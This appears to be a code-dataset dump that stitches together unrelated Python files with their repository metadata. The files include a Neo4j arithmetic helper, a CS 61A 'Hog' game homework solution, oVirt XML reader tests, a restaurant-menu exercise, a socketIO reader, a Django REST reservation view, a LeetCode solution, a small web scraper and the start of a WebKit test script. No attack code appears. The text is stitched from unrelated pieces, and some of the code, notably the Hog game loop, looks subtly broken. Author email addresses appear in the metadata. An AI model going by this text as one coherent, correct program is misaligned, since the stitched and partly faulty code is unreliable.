# Copyright (c) 2002-2020 "Neo4j,"
# Neo4j Sweden AB [http://neo4j.com]
#
# This file is part of Neo4j.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from math import isnan
def nano_add(x, y):
"""
>>> 0.7 + 0.2
0.8999999999999999
>>> -0.7 + 0.2
-0.49999999999999994
>>> nano_add(0.7, 0.2)
0.9
>>> nano_add(-0.7, 0.2)
-0.5
:param x:
:param y:
:return:
"""
return (int(1000000000 * x) + int(1000000000 * y)) / 1000000000
def nano_sub(x, y):
"""
>>> 0.7 - 0.2
0.49999999999999994
>>> -0.7 - 0.2
-0.8999999999999999
>>> nano_sub(0.7, 0.2)
0.5
>>> nano_sub(-0.7, 0.2)
-0.9
:param x:
:param y:
:return:
"""
return (int(1000000000 * x) - int(1000000000 * y)) / 1000000000
def nano_mul(x, y):
"""
>>> 0.7 * 0.2
0.13999999999999999
>>> -0.7 * 0.2
-0.13999999999999999
>>> nano_mul(0.7, 0.2)
0.14
>>> nano_mul(-0.7, 0.2)
-0.14
:param x:
:param y:
:return:
"""
return int(1000000000 * x) * int(1000000000 * y) / 1000000000000000000
def nano_div(x, y):
"""
>>> 0.7 / 0.2
3.4999999999999996
>>> -0.7 / 0.2
-3.4999999999999996
>>> nano_div(0.7, 0.2)
3.5
>>> nano_div(-0.7, 0.2)
-3.5
:param x:
:param y:
:return:
"""
return float(1000000000 * x) / int(1000000000 * y)
def nano_mod(x, y):
"""
>>> 0.7 % 0.2
0.09999999999999992
>>> -0.7 % 0.2
0.10000000000000009
>>> nano_mod(0.7, 0.2)
0.1
>>> nano_mod(-0.7, 0.2)
0.1
:param x:
:param y:
:return:
"""
number = type(x)
nx = int(1000000000 * x)
ny = int(1000000000 * y)
q, r = divmod(nx, ny)
return number(r / 1000000000)
def nano_divmod(x, y):
"""
>>> divmod(0.7, 0.2)
(3.0, 0.09999999999999992)
>>> nano_divmod(0.7, 0.2)
(3, 0.1)
:param x:
:param y:
:return:
"""
number = type(x)
nx = int(1000000000 * x)
ny = int(1000000000 * y)
q, r = divmod(nx, ny)
return int(q), number(r / 1000000000)
def signum(n):
try:
if isnan(n):
return float("nan")
if n > 0 or n == float("inf"):
return 1
if n < 0 or n == float("-inf"):
return -1
return 0
except TypeError:
raise TypeError(n)
def symmetric_divmod(dividend, divisor):
number = type(dividend)
if dividend >= 0:
quotient, remainder = divmod(dividend, divisor)
return int(quotient), number(remainder)
else:
quotient, remainder = divmod(-dividend, divisor)
return -int(quotient), -number(remainder)
def round_half_to_even(n):
"""
>>> round_half_to_even(3)
3
>>> round_half_to_even(3.2)
3
>>> round_half_to_even(3.5)
4
>>> round_half_to_even(3.7)
4
>>> round_half_to_even(4)
4
>>> round_half_to_even(4.2)
4
>>> round_half_to_even(4.5)
4
>>> round_half_to_even(4.7)
5
:param n:
:return:
"""
ten_n = 10 * n
if ten_n == int(ten_n) and ten_n % 10 == 5:
up = int(n + 0.5)
down = int(n - 0.5)
return up if up % 2 == 0 else down
else:
return int(round(n))
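# The docstrings above double as executable examples; a minimal way to run them
# all (assuming this module is executed directly) is the standard doctest tool:
if __name__ == "__main__":
    import doctest
    doctest.testmod()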
|
[
"omerl1308@gmail.com"
] |
omerl1308@gmail.com
|
b19775a6ca6dc6d028c8ce0a658a8fc8661e20a9
|
070afb87f2c5fc0dd749204ab648043b86c39088
|
/hog/hog.py
|
52c4d3492438c321604599cbfd6c329b3cd82352
|
[] |
no_license
|
mitchwong2021/CS61A
|
1fa22a955598dd3218aaf6561b8f291532a1b15b
|
709ced7b3dce20ee38257e41131ceac8757aee33
|
refs/heads/master
| 2020-03-16T19:54:53.087499
| 2018-05-10T21:25:58
| 2018-05-10T21:25:58
| 132,937,615
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,123
|
py
|
"""CS 61A Presents The Game of Hog."""
from dice import six_sided, four_sided, make_test_dice
from ucb import main, trace, interact
GOAL_SCORE = 100 # The goal of Hog is to score 100 points.
######################
# Phase 1: Simulator #
######################
def roll_dice(num_rolls, dice=six_sided):
"""Simulate rolling the DICE exactly NUM_ROLLS > 0 times. Return the sum of
the outcomes unless any of the outcomes is 1. In that case, return 1.
num_rolls: The number of dice rolls that will be made.
dice: A function that simulates a single dice roll outcome.
"""
# These assert statements ensure that num_rolls is a positive integer.
assert type(num_rolls) == int, 'num_rolls must be an integer.'
assert num_rolls > 0, 'Must roll at least once.'
# BEGIN PROBLEM 1
"*** YOUR CODE HERE ***"
rolled_one, score, i = False, 0, 0
while i < num_rolls :
result = dice() #store the function's value in a variable
score = score + result
i = i + 1
if result == 1 :
rolled_one = True
if rolled_one == True :
return 1
else :
return score
# END PROBLEM 1
def free_bacon(score):
"""Return the points scored from rolling 0 dice (Free Bacon).
score: The opponent's current score.
"""
assert score < 100, 'The game should be over.'
# BEGIN PROBLEM 2
"*** YOUR CODE HERE ***" # A player who chooses to roll zero dice
# scores 2 more than the absolute difference
# between the digits in the opponent's total score.
bacon = 0
if len(str(score)) == 1 :
bacon = score + 2
else :
val = (score % 10) - (score - score % 10)//10
if val > 0 :
bacon = val + 2
else :
bacon = 2 - val
return bacon
# END PROBLEM 2
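    # Worked examples of the rule above: free_bacon(42) == abs(4 - 2) + 2 == 4,
    # and for a single-digit opponent score, free_bacon(7) == 7 + 2 == 9.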
def take_turn(num_rolls, opponent_score, dice=six_sided):
"""Simulate a turn rolling NUM_ROLLS dice, which may be 0 (Free Bacon).
Return the points scored for the turn by the current player.
num_rolls: The number of dice rolls that will be made.
opponent_score: The total score of the opponent.
dice: A function that simulates a single dice roll outcome.
"""
# Leave these assert statements here; they help check for errors.
assert type(num_rolls) == int, 'num_rolls must be an integer.'
assert num_rolls >= 0, 'Cannot roll a negative number of dice in take_turn.'
assert num_rolls <= 10, 'Cannot roll more than 10 dice.'
assert opponent_score < 100, 'The game should be over.'
# BEGIN PROBLEM 3
"*** YOUR CODE HERE ***"
score = 0
x = num_rolls
if num_rolls == 0 :
score = free_bacon(opponent_score)
return score
else:
score = roll_dice(x, dice) # I needed to pass in the "dice" function parameter
return score
# END PROBLEM 3
def is_swap(score0, score1):
"""Return whether one of the scores is an integer multiple of the other."""
# BEGIN PROBLEM 4
"*** YOUR CODE HERE ***"
if score0 > score1 :
if score1 == 0 :
return False
elif score1 == 1 :
return False
elif score0 % score1 == 0 :
return True
else :
return False
elif score1 > score0 :
if score0 == 0:
return False
elif score0 == 1 :
return False
elif score1 % score0 == 0 :
return True
        else :
            return False
    else :
        # score0 == score1 previously fell through and returned None;
        # make the (equally falsy) result explicit
        return False
# END PROBLEM 4
def other(player):
"""Return the other player, for a player PLAYER numbered 0 or 1.
>>> other(0)
1
>>> other(1)
0
"""
return 1 - player
def silence(score0, score1):
"""Announce nothing (see Phase 2)."""
return silence
def play(strategy0, strategy1, score0=0, score1=0, dice=six_sided,
goal=GOAL_SCORE, say=silence):
"""Simulate a game and return the final scores of both players, with Player
0's score first, and Player 1's score second.
A strategy is a function that takes two total scores as arguments (the
current player's score, and the opponent's score), and returns a number of
dice that the current player will roll this turn.
strategy0: The strategy function for Player 0, who plays first.
strategy1: The strategy function for Player 1, who plays second.
score0: Starting score for Player 0
score1: Starting score for Player 1
dice: A function of zero arguments that simulates a dice roll.
goal: The game ends and someone wins when this score is reached.
say: The commentary function to call at the end of the first turn.
"""
player = 0 # Which player is about to take a turn, 0 (first) or 1 (second)
# BEGIN PROBLEM 5
while score0 < goal and score1 < goal:
score0 += take_turn(strategy0(score0, score1), score1, dice)
if is_swap(score0,score1):
            score0, score1 = score1, score0
if score0 >=goal:
say(score0,score1)
return score0, score1
elif score1 >=goal:
say = say(score0,score1)
return score0, score1
say = say(score0,score1)
score1 += take_turn(strategy1(score1, score0), score0, dice)
if is_swap(score0,score1):
            score0, score1 = score1, score0
if score0 >=goal:
say = say(score0,score1)
return score0, score1
elif score1 >=goal:
say = say(score0,score1)
return score0, score1
say = say(score0,score1)
# END PROBLEM 5
#######################
# Phase 2: Commentary #
#######################
def say_scores(score0, score1):
"""A commentary function that announces the score for each player."""
print("Player 0 now has", score0, "and Player 1 now has", score1)
return say_scores
def announce_lead_changes(previous_leader=None):
"""Return a commentary function that announces lead changes.
>>> f0 = announce_lead_changes()
>>> f1 = f0(5, 0)
Player 0 takes the lead by 5
>>> f2 = f1(5, 12)
Player 1 takes the lead by 7
>>> f3 = f2(8, 12)
>>> f4 = f3(8, 13)
>>> f5 = f4(15, 13)
Player 0 takes the lead by 2
"""
def say(score0, score1):
if score0 > score1:
leader = 0
elif score1 > score0:
leader = 1
else:
leader = None
if leader != None and leader != previous_leader:
print('Player', leader, 'takes the lead by', abs(score0 - score1))
return announce_lead_changes(leader)
return say
def both(f, g):
"""Return a commentary function that says what f says, then what g says.
>>> h0 = both(say_scores, announce_lead_changes())
>>> h1 = h0(10, 0)
Player 0 now has 10 and Player 1 now has 0
Player 0 takes the lead by 10
>>> h2 = h1(10, 6)
Player 0 now has 10 and Player 1 now has 6
>>> h3 = h2(6, 18) # Player 0 gets 8 points, then Swine Swap applies
Player 0 now has 6 and Player 1 now has 18
Player 1 takes the lead by 12
"""
def say(score0, score1):
return both(f(score0, score1), g(score0, score1))
return say
def announce_highest(who, previous_high=0, previous_score=0): #the previous_high is the previous highest gain!
"""Return a commentary function that announces when WHO's score
increases by more than ever before in the game.
>>> f0 = announce_highest(1) # Only announce Player 1 score gains
>>> f1 = f0(11, 0)
>>> f2 = f1(11, 1)
1 point! That's the biggest gain yet for Player 1
>>> f3 = f2(20, 1)
>>> f4 = f3(5, 20) # Player 1 gets 4 points, then Swine Swap applies
19 points! That's the biggest gain yet for Player 1
>>> f5 = f4(20, 40) # Player 0 gets 35 points, then Swine Swap applies
20 points! That's the biggest gain yet for Player 1
>>> f6 = f5(20, 55) # Player 1 gets 15 points; not enough for a new high
"""
assert who == 0 or who == 1, 'The who argument should indicate a player.'
# BEGIN PROBLEM 7
"*** YOUR CODE HERE ***"
def say(score0, score1):
if who == 1:
gain = score1 - previous_score
player = 1
x = score1
else:
gain = score0 - previous_score
player = 0
x = score0
if gain > previous_high and gain == 1:
print(gain, "point! That's the biggest gain yet for Player", player)
elif gain > previous_high :
print(gain, "points! That's the biggest gain yet for Player", player)
if gain > previous_high:
return announce_highest(who, gain, x)
else:
return announce_highest(who, previous_high, x)
return say
# END PROBLEM 7
#######################
# Phase 3: Strategies #
#######################
def always_roll(n):
"""Return a strategy that always rolls N dice.
A strategy is a function that takes two total scores as arguments (the
current player's score, and the opponent's score), and returns a number of
dice that the current player will roll this turn.
>>> strategy = always_roll(5)
>>> strategy(0, 0)
5
>>> strategy(99, 99)
5
"""
def strategy(score, opponent_score):
return n
return strategy
def make_averaged(fn, num_samples=1000):
"""Return a function that returns the average value of FN when called.
To implement this function, you will have to use *args syntax, a new Python
feature introduced in this project. See the project description.
>>> dice = make_test_dice(4, 2, 5, 1)
>>> averaged_dice = make_averaged(dice, 1000)
>>> averaged_dice()
3.0
"""
# BEGIN PROBLEM 8
"*** YOUR CODE HERE ***"
def zod(*args):
i, sum = 0, 0
while i < num_samples:
i, sum = i + 1, sum + fn(*args)
return sum/ num_samples
return zod
# END PROBLEM 8
def max_scoring_num_rolls(dice=six_sided, num_samples=1000):
"""Return the number of dice (1 to 10) that gives the highest average turn
score by calling roll_dice with the provided DICE over NUM_SAMPLES times.
Assume that the dice always return positive outcomes.
>>> dice = make_test_dice(1, 6)
    >>> max_scoring_num_rolls(dice)
1
"""
# BEGIN PROBLEM 9
"*** YOUR CODE HERE ***"
max_dice, number_of_dice, max_value = 0, 10, 0
while number_of_dice>0:
x = make_averaged(roll_dice)(number_of_dice, dice)
if x > max_value:
max_value = x
max_dice = number_of_dice
number_of_dice -=1
return max_dice
# END PROBLEM 9
def winner(strategy0, strategy1):
"""Return 0 if strategy0 wins against strategy1, and 1 otherwise."""
score0, score1 = play(strategy0, strategy1)
if score0 > score1:
return 0
else:
return 1
def average_win_rate(strategy, baseline=always_roll(4)):
"""Return the average win rate of STRATEGY against BASELINE. Averages the
winrate when starting the game as player 0 and as player 1.
"""
win_rate_as_player_0 = 1 - make_averaged(winner)(strategy, baseline)
win_rate_as_player_1 = make_averaged(winner)(baseline, strategy)
return (win_rate_as_player_0 + win_rate_as_player_1) / 2
def run_experiments():
"""Run a series of strategy experiments and report results."""
if True: # Change to False when done finding max_scoring_num_rolls
six_sided_max = max_scoring_num_rolls(six_sided)
print('Max scoring num rolls for six-sided dice:', six_sided_max)
if False: # Change to True to test always_roll(8)
print('always_roll(8) win rate:', average_win_rate(always_roll(8)))
if False: # Change to True to test bacon_strategy
print('bacon_strategy win rate:', average_win_rate(bacon_strategy))
if False: # Change to True to test swap_strategy
print('swap_strategy win rate:', average_win_rate(swap_strategy))
if False: # Change to True to test final_strategy
print('final_strategy win rate:', average_win_rate(final_strategy))
"*** You may add additional experiments as you wish ***"
def bacon_strategy(score, opponent_score, margin=8, num_rolls=4):
"""This strategy rolls 0 dice if that gives at least MARGIN points, and
rolls NUM_ROLLS otherwise.
"""
# BEGIN PROBLEM 10
if free_bacon(opponent_score) >= margin:
return 0
else:
return num_rolls
# END PROBLEM 10
def swap_strategy(score, opponent_score, margin=8, num_rolls=4):
"""This strategy rolls 0 dice when it triggers a beneficial swap. It also
rolls 0 dice if it gives at least MARGIN points. Otherwise, it rolls
NUM_ROLLS.
"""
# BEGIN PROBLEM 11
if free_bacon(opponent_score) >= margin:
return 0
elif is_swap(score, opponent_score) == True and opponent_score > score:
return 0
else:
return num_rolls
# END PROBLEM 11
def final_strategy(score, opponent_score):
"""Write a brief description of your final strategy.
*** YOUR DESCRIPTION HERE ***
"""
# BEGIN PROBLEM 12
return 4 # Replace this statement
# END PROBLEM 12
##########################
# Command Line Interface #
##########################
# NOTE: Functions in this section do not need to be changed. They use features
# of Python not yet covered in the course.
@main
def run(*args):
"""Read in the command-line argument and calls corresponding functions.
This function uses Python syntax/techniques not yet covered in this course.
"""
import argparse
parser = argparse.ArgumentParser(description="Play Hog")
parser.add_argument('--run_experiments', '-r', action='store_true',
help='Runs strategy experiments')
args = parser.parse_args()
if args.run_experiments:
run_experiments()
|
[
"noreply@github.com"
] |
mitchwong2021.noreply@github.com
|
b00c7ba14a6e28b8a9fd1d4c603605f6e97f4ff7
|
da750f9ffee13f8388e0d3ac48db2eab562e5a2b
|
/tests/test_fault_reader.py
|
5b03453e681de92e0024dfadde4ca533df9401c1
|
[
"Apache-2.0"
] |
permissive
|
fjanuska/python-ovirt-engine-sdk4
|
f86085da0d1e3044d04c41aee5b842ccec37a094
|
8d51d43c63709a2c6064a9d9b8e095874fff4f2e
|
refs/heads/main
| 2023-08-18T13:12:46.491667
| 2021-09-29T13:18:01
| 2021-09-29T13:18:01
| 411,636,996
| 0
| 0
|
Apache-2.0
| 2021-09-29T10:56:52
| 2021-09-29T10:56:51
| null |
UTF-8
|
Python
| false
| false
| 2,814
|
py
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from io import BytesIO
from nose.tools import *
from ovirtsdk4 import types
from ovirtsdk4 import readers
from ovirtsdk4.xml import XmlReader
def make_reader(text):
"""
    Creates an XML reader that reads from the given text.
"""
return XmlReader(BytesIO(text.encode('utf-8')))
def test_read_one_with_empty_xml():
"""
    Checks that given an empty XML element the `read_one` method creates
    the expected fault.
"""
reader = make_reader('<fault/>')
result = readers.FaultReader.read_one(reader)
reader.close()
assert_is_not_none(result)
assert_is(type(result), types.Fault)
assert_is_none(result.reason)
assert_is_none(result.detail)
def test_read_one_with_reason_only():
"""
    Checks that given an XML with only the reason element the
    `read_one` method creates the expected fault.
"""
reader = make_reader('<fault><reason>myreason</reason></fault>')
result = readers.FaultReader.read_one(reader)
reader.close()
assert_is_not_none(result)
assert_is(type(result), types.Fault)
assert_equals(result.reason, 'myreason')
assert_is_none(result.detail)
def test_read_one_with_detail_only():
"""
    Checks that given an XML with only the detail element the
    `read_one` method creates the expected fault.
"""
reader = make_reader('<fault><detail>mydetail</detail></fault>')
result = readers.FaultReader.read_one(reader)
reader.close()
assert_is_not_none(result)
assert_is(type(result), types.Fault)
assert_is_none(result.reason)
assert_equals(result.detail, 'mydetail')
def test_read_one_with_reason_and_detail():
"""
    Checks that given an XML with both the reason and detail
    elements the `read_one` method creates the expected fault.
"""
reader = make_reader("""
<fault>
<reason>myreason</reason>
<detail>mydetail</detail>
</fault>
""")
result = readers.FaultReader.read_one(reader)
reader.close()
assert_is_not_none(result)
assert_is(type(result), types.Fault)
assert_equals(result.reason, 'myreason')
assert_equals(result.detail, 'mydetail')
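# These tests follow nose conventions (module-level test_* functions plus
# assert_* helpers), so a typical invocation would be `nosetests` pointed at
# this file; the exact path depends on the project layout.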
|
[
"necas.marty@gmail.com"
] |
necas.marty@gmail.com
|
7456e413b9a3950f919689a98dbe123bc227b91e
|
0a584b8d564e1cf3b2c4fbc3c4fa2a74007dcb00
|
/script.py
|
a1ae18f5df84505790f67c6246887b363864bd22
|
[] |
no_license
|
obour2021/Basta-Fazoolin-
|
079902d8d03bf24904a3dc5e251f79fa792961e0
|
4edbfd6b76b0cd6703c0149fdde165f88e7285cb
|
refs/heads/master
| 2023-06-12T16:48:35.318264
| 2021-07-06T12:13:11
| 2021-07-06T12:13:11
| 383,453,712
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,824
|
py
|
class Menu:
def __init__(self, name, items, start_time, end_time):
self.name = name
self.items = items
self.start_time = start_time
self.end_time = end_time
def __repr__(self):
return "{name} menu available from {start_time}:00GMT to {end_time}:00GMT".format(name=self.name, start_time=self.start_time, end_time=self.end_time)
def calculate_bill(self, purchased_items):
total_bill = 0
for purchased_item in purchased_items:
if purchased_item in self.items:
total_bill += self.items[purchased_item]
return total_bill
class Franchise:
def __init__(self, address, menus):
self.address = address
self.menus = menus
def __repr__(self):
return "This Franchise is located at {address}.".format(address=self.address)
def available_menus(self, time):
available_menus = []
for menu in self.menus:
if time >= menu.start_time and time <= menu.end_time:
available_menus.append(menu)
return available_menus
class Business:
def __init__(self, name, franchises):
self.name = name
        self.franchises = franchises  # fixed: previously assigned the (undefined-at-class-time) name 'franchise' instead of the parameter
brunch_items = {
'pancakes': 7.50, 'waffles': 9.00, 'burger': 11.00, 'home fries': 4.50, 'coffee': 1.50, 'espresso': 3.00, 'tea': 1.00, 'mimosa': 10.50, 'orange juice': 3.50
}
brunch = Menu("Brunch", brunch_items, 11, 16)
early_bird_items = {
'salumeria plate': 8.00, 'salad and breadsticks (serves 2, no refills)': 14.00, 'pizza with quattro formaggi': 9.00, 'duck ragu': 17.50, 'mushroom ravioli (vegan)': 13.50, 'coffee': 1.50, 'espresso': 3.00,
}
early_bird = Menu("Early-bird Dinners", early_bird_items, 15, 18)
dinner_items = {
'crostini with eggplant caponata': 13.00, 'ceaser salad': 16.00, 'pizza with quattro formaggi': 11.00, 'duck ragu': 19.50, 'mushroom ravioli (vegan)': 13.50, 'coffee': 2.00, 'espresso': 3.00,
}
dinner = Menu("Dinner", dinner_items, 17, 23)
kids_items = {
'chicken nuggets': 6.50, 'fusilli with wild mushrooms': 12.00, 'apple juice': 3.00
}
kids = Menu("Kids", kids_items, 11, 21)
arepas_menu_items = {
'arepa pabellon': 7.00, 'pernil arepa': 8.50, 'guayanes arepa': 8.00, 'jamon arepa': 7.50
}
arepas_menu = Menu("Take a’ Arepa", arepas_menu_items, 10, 20)
menus = [brunch, early_bird, dinner, kids, arepas_menu]
flagship_store = Franchise("1232 West End Road", menus)
new_installment = Franchise("12 East Mulberry Street", menus)
arepas_place = Franchise("189 Fitzgerald Avenue", menus)
franchise = [flagship_store, new_installment, arepas_place]
first_business = Business("Basta Fazoolin' with my Heart", franchise)
new_business = Business("Take a' Arepa", franchise)
print(flagship_store.available_menus(23))
print(early_bird.calculate_bill(['mushroom ravioli (vegan)', 'salumeria plate']))
print(brunch.calculate_bill(['pancakes', 'home fries', 'coffee']))
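# With Business storing its franchise list (see the corrected constructor
# above), a quick illustrative query could be:
#   first_business.franchises[0].available_menus(12)  # menus served at noon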
|
[
"isaac.mensah@amalitech.org"
] |
isaac.mensah@amalitech.org
|
92b02adbbcf00bbc96565f31382f594567671f18
|
04b26abb0b9eba98baaa82bdb144cf2b3e9cee42
|
/autocomplete_api/apps.py
|
9c04a682ff41fa1873ebb61a40b6fb6b34d7adb8
|
[] |
no_license
|
ped-alm/Dito_Challenge
|
46f04628ede60d5c680721bb28f945093b61b422
|
ae0dafd58acf1083e9d34057827e19b29a3ab396
|
refs/heads/master
| 2020-04-20T16:26:03.185376
| 2019-02-08T12:28:50
| 2019-02-08T12:28:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 106
|
py
|
from django.apps import AppConfig
class AutoCompleteApiConfig(AppConfig):
name = 'autocomplete_api'
|
[
"pedrohenriquealmeidacosta@gmail.com"
] |
pedrohenriquealmeidacosta@gmail.com
|
22db75686ffaf6b5f0da276f630ea779f6ee2271
|
b41a33dff85005ed970f80fcec781436b63c6103
|
/tributary/reactive/input/socketio.py
|
750a694ac1660e00c764be1527841af77bb0673a
|
[
"Apache-2.0"
] |
permissive
|
deepankarsharma/tributary
|
afcf0f3bd048f8a792caec572ef9a4f97a2fb2f3
|
aa0eddc3f83a30b4e43f2c1771a1e00fd9d97cd7
|
refs/heads/master
| 2020-03-28T21:51:35.641555
| 2018-09-17T20:59:38
| 2018-09-17T20:59:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,082
|
py
|
from socketIO_client_nexus import SocketIO as SIO
import json as json_module  # imported under an alias: the 'json' keyword argument below shadows the module name
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from ..base import _wrap
def SocketIO(url, *args, **kwargs):
return SyncSocketIO(url, *args, **kwargs)
def SyncSocketIO(url, channel='', field='', sendinit=None, json=False, wrap=False, interval=1):
o = urlparse(url)
socketIO = SIO(o.scheme + '://' + o.netloc, o.port)
if sendinit:
socketIO.emit(sendinit)
def _sio(url, channel, field='', json=False, wrap=False, interval=1):
while True:
_data = []
socketIO.on(channel, lambda data: _data.append(data))
socketIO.wait(seconds=interval)
for msg in _data:
if json:
                    msg = json_module.loads(msg)
if field:
msg = msg[field]
if wrap:
msg = [msg]
yield msg
return _wrap(_sio, dict(url=url, channel=channel, field=field, json=json, wrap=wrap, interval=interval), name='SocketIO')
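# A minimal usage sketch (the URL and channel are hypothetical; SocketIO here
# returns the generator-producing wrapper built by _wrap above):
#   stream = SocketIO('http://localhost:3000', channel='data', json=True, wrap=True)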
|
[
"t.paine154@gmail.com"
] |
t.paine154@gmail.com
|
d10fcd68f8efb426334892649e0a7128f55b1fd4
|
a9f676c06bacee1f8b27e08d3c411c89a69cfd40
|
/falmer/studentgroups/views.py
|
3c28e4397c6ade0b3db42472038d4f3fa933b6b4
|
[
"MIT"
] |
permissive
|
sussexstudent/falmer
|
1b877c3ac75a0477f155ce1a9dee93a5ada686d6
|
ae735bd9d6177002c3d986e5c19a78102233308f
|
refs/heads/master
| 2022-12-11T19:40:12.232488
| 2020-03-20T13:01:47
| 2020-03-20T13:01:47
| 88,043,958
| 2
| 3
|
MIT
| 2022-12-08T03:17:26
| 2017-04-12T11:24:02
|
Python
|
UTF-8
|
Python
| false
| false
| 37
|
py
|
from django.http import JsonResponse
|
[
"james@brudil.com"
] |
james@brudil.com
|
401fbd0e0fe0707b28342acd94a30e4a0988e967
|
228de37ad02ee9af51a208ad3287224af1f2c472
|
/app/reservation/apis/reservation.py
|
e05f7278c55cc03bd59302529d88a865ff36c81d
|
[] |
no_license
|
kahee/MySmallTrip
|
cb0b0a9afdee009f3b4055af92af0bc5ec50f0cd
|
75e1bf32993f137e70360f6aa3b22904d61bd24c
|
refs/heads/master
| 2022-12-11T18:57:12.494011
| 2018-09-02T09:12:59
| 2018-09-02T09:12:59
| 130,799,032
| 1
| 0
| null | 2022-12-08T01:01:50
| 2018-04-24T05:08:26
|
Python
|
UTF-8
|
Python
| false
| false
| 1,210
|
py
|
from rest_framework import status, permissions
from rest_framework.response import Response
from rest_framework.views import APIView
from reservation.models import Reservation
from reservation.serializer import ReservationCreateSerializer, ReservationListSerializer
class ReservationCreateView(APIView):
permission_classes = (
permissions.IsAuthenticated,
)
    def get(self, request):  # DRF passes the request to handler methods
context = {'request': self.request}
reservation_informations = Reservation.objects.filter()
serializer = ReservationCreateSerializer(reservation_informations, context=context, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
def post(self, request):
context = {
'request': self.request,
}
serializer = ReservationCreateSerializer(data=request.data, context=context)
if serializer.is_valid(raise_exception=True):
reservation = serializer.save()
data = {
'reservation': ReservationListSerializer(reservation).data
}
return Response(data, status=status.HTTP_201_CREATED)
else:
return Response(status=status.HTTP_400_BAD_REQUEST)
|
[
"hsj2334@gmail.com"
] |
hsj2334@gmail.com
|
7b5e42b03d83f409b260b99e32203f2b92baa90d
|
cb3d1b072391b07ef0e9596df7f223f37683e970
|
/[0448]_Find_All_Numbers_Disappeared_in_an_Array/Find_All_Numbers_Disappeared_in_an_Array.py
|
d6f8e35a55cb7a49492d347457eed1386a3ed63a
|
[] |
no_license
|
kotori233/LeetCode
|
99620255a64c898457901602de5db150bc35aabb
|
996f9fcd26326db9b8f49078d9454fffb908cafe
|
refs/heads/master
| 2021-09-10T18:00:56.968949
| 2018-03-30T14:38:27
| 2018-03-30T14:38:27
| 103,036,334
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 490
|
py
|
class Solution(object):
def findDisappearedNumbers(self, nums):
"""
:type nums: List[int]
:rtype: List[int]
"""
n = len(nums)
res = []
for i in range(n):
while nums[i] != i + 1 and nums[i] != nums[nums[i] - 1]:
temp = nums[i] - 1
nums[i], nums[temp] = nums[temp], nums[i]
for i in range(n):
if nums[i] != i + 1:
res.append(i + 1)
return res
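# Example: findDisappearedNumbers([4, 3, 2, 7, 8, 2, 3, 1]) -> [5, 6].
# The while loop cyclically swaps each value v toward index v - 1, so the
# second pass can simply report the indices whose expected value never arrived.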
|
[
"cycycy3333@163.com"
] |
cycycy3333@163.com
|
c1a9bd3f28bb8cf15970e6bb6d06f6a3be4f8bbb
|
c492ca97c553319be3965a4ec79fa11cfe959c1f
|
/parser_project_1.py
|
46fb9402b7178913bee30e83fece8e031164be26
|
[] |
no_license
|
rocketpy/web_scraping
|
a626b8459a2d7fbcd5d6e7e4a8c35fcb55fbd59d
|
53b4ef7e204efa08199c14c29b5501b454280cc8
|
refs/heads/master
| 2022-09-15T13:24:07.225362
| 2022-08-29T20:45:03
| 2022-08-29T20:45:03
| 178,544,090
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,017
|
py
|
import csv
import requests
from bs4 import BeautifulSoup
def get_html(url):
r = requests.get(url)
return r.text
def refined(s):
r = s.split(' ')[0]
return r.replace('.00', '')
def write_csv(data):
with open('file_name.csv', 'a') as f:
writer = csv.writer(f, delimiter=',')
writer.writerow((data['name'],
data['url'],
data['reviews']))
def get_data(html):
    parse = BeautifulSoup(html, 'lxml')
    popular = parse.find_all('section')[1]
    plugins = popular.find_all('article')
    for i in plugins:
name = i.find('h2').text
url = i.find('h2').find('a').get('href')
r = i.find('span', class_='rating-count').find('a').text
rating = refined(r)
data = {'name': name,
'url': url,
'reviews': rating}
write_csv(data)
def main():
url = 'https://www...'
get_data(get_html(url))
if __name__ == '__main__':
main()
|
[
"noreply@github.com"
] |
rocketpy.noreply@github.com
|
c41f4e23a8c90d9a853b30e124a05c5d69277989
|
4daed53ef188fe57fc90771c9042dd137e306261
|
/WebKit/Tools/Scripts/run-gtk-tests
|
df3d66cd4a75498506b6cda51340381097623e6a
|
[
"Apache-2.0"
] |
permissive
|
JavaScriptTesting/LJS
|
ece7d0537b514e06f7f6b26cb06a9ab4e6cd7e10
|
9818dbdb421036569fff93124ac2385d45d01c3a
|
refs/heads/master
| 2020-03-12T14:28:41.437178
| 2018-04-25T10:55:15
| 2018-04-25T10:55:15
| 130,668,210
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,168
|
#!/usr/bin/env python
#
# Copyright (C) 2011 Igalia S.L.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public License
# along with this library; see the file COPYING.LIB. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301, USA.
from webkitpy.common.system.executive import Executive
import subprocess
import os, sys
class TestRunner:
TEST_DIRS = [ "unittests", "WebKit2APITests" ]
# FIXME: https://bugs.webkit.org/show_bug.cgi?id=74717
